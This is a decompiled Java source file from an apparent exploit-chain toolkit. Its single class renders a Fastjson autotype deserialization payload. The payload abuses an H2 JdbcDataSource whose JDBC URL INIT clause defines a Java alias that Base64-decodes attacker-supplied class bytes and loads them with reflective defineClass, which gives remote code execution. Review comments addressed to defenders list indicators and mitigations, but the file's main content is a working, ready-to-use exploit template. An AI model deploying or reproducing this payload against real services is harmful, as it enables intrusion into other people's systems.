package com.ar3h.chains.gadget.impl.fastjson;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import org.apache.commons.codec.binary.Base64;

/**
 * Gadget that renders a Fastjson payload string around class bytes supplied by the next
 * gadget in the chain (decompiled from chains-core-1.4.1.jar).
 *
 * <p>What the rendered text contains, as visible in {@link #template}:
 * <ul>
 *   <li>an {@code "x1"} member with {@code @type} {@code java.lang.Class} and {@code val}
 *       {@code org.h2.jdbcx.JdbcDataSource};</li>
 *   <li>a second member whose <em>key</em> is a {@code com.alibaba.fastjson.JSONObject}
 *       holding an {@code org.h2.jdbcx.JdbcDataSource} with a {@code url} property; an object
 *       used as a key is not valid strict JSON;</li>
 *   <li>an in-memory H2 JDBC URL whose {@code INIT=} clause creates an alias from inline
 *       Java source and calls it; that source Base64-decodes the embedded bytes, passes
 *       them to {@code ClassLoader.defineClass} via reflection and instantiates the
 *       resulting class.</li>
 * </ul>
 *
 * <p>Review notes for defenders:
 * <ul>
 *   <li>Indicators present in the template: {@code @type} members in inbound JSON naming
 *       {@code java.lang.Class} or {@code org.h2.jdbcx.JdbcDataSource}, and {@code jdbc:h2:}
 *       URLs carrying {@code INIT=} together with {@code CREATE ALIAS}.</li>
 *   <li>The alias source catches {@code Exception} with an empty handler, so a failure
 *       inside it produces no stack trace from that code.</li>
 *   <li>Mitigations to evaluate on the parsing side: a Fastjson release outside the range
 *       declared in the annotation with autotype left disabled (or Fastjson safeMode), and
 *       never letting untrusted input choose a JDBC URL.</li>
 *   <li>NOTE(review): the annotation name says "1.2.47" while the dependency string says
 *       {@code fastjson <= 1.2.61}; confirm which version range is actually intended.</li>
 * </ul>
 */
@GadgetAnnotation(name = "H2Jdbc 1.2.47", dependencies = {"com.h2database:h2 <= 2.2.224", "fastjson <= 1.2.61"})
@GadgetTags(tags = {Tag.FastjsonPayload}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/fastjson/FastjsonH2Jdbc.class */
public class FastjsonH2Jdbc implements Gadget {
    // Format string with exactly one %s placeholder, filled with Base64 text by getObject().
    // The literal is escaped for several nested layers (Java string, JSON string, H2 URL where
    // ';' is written as "\;", and the Java source inside the alias), so it must be kept
    // byte-for-byte.
    // NOTE(review): the field is public, static and not final, so any code in the same JVM
    // can reassign it; whether other classes rely on that is not visible from this file.
    public static String template = "{\n    \"x1\": {\n        \"@type\": \"java.lang.Class\",\n        \"val\": \"org.h2.jdbcx.JdbcDataSource\"\n    },\n    {\n        \"@type\": \"com.alibaba.fastjson.JSONObject\",\n        \"c\": {\n            \"@type\": \"org.h2.jdbcx.JdbcDataSource\",\n            \"url\": \"jdbc:h2:mem:test;MODE=MSSQLServer;INIT=drop alias if exists exec\\\\;CREATE ALIAS EXEC AS 'void exec() throws java.io.IOException { try { byte[] b = java.util.Base64.getDecoder().decode(\\\"%s\\\")\\\\; java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod(\\\"defineClass\\\", byte[].class, int.class, int.class)\\\\; method.setAccessible(true)\\\\; Class c = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), b, 0, b.length)\\\\; c.newInstance()\\\\; } catch (Exception e){ }}'\\\\;CALL EXEC ()\\\\;\"\n        }\n    }: {}\n}";

    /**
     * Renders {@link #template} with the given bytes.
     *
     * @param bArr bytes to embed; they are Base64-encoded with commons-codec before being
     *             substituted for the single {@code %s} in the template
     * @return the formatted payload text
     */
    private String getObject(byte[] bArr) {
        return String.format(template, Base64.encodeBase64String(bArr));
    }

    /**
     * Asks the chain for the next gadget's output and wraps it in the template.
     *
     * @param gadgetContext context handed through to {@code gadgetChain.doCreate}
     * @param gadgetChain   chain whose {@code doCreate} result is cast to {@code byte[]};
     *                      presumably class bytes, given {@code nextTags = BytecodeConvertTag}
     *                      (confirm against the chain implementation)
     * @return the formatted payload as a {@code String}
     * @throws Exception whatever {@code doCreate} throws; a result that is not a
     *                   {@code byte[]} fails the cast with {@code ClassCastException}
     */
    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext));
    }
}
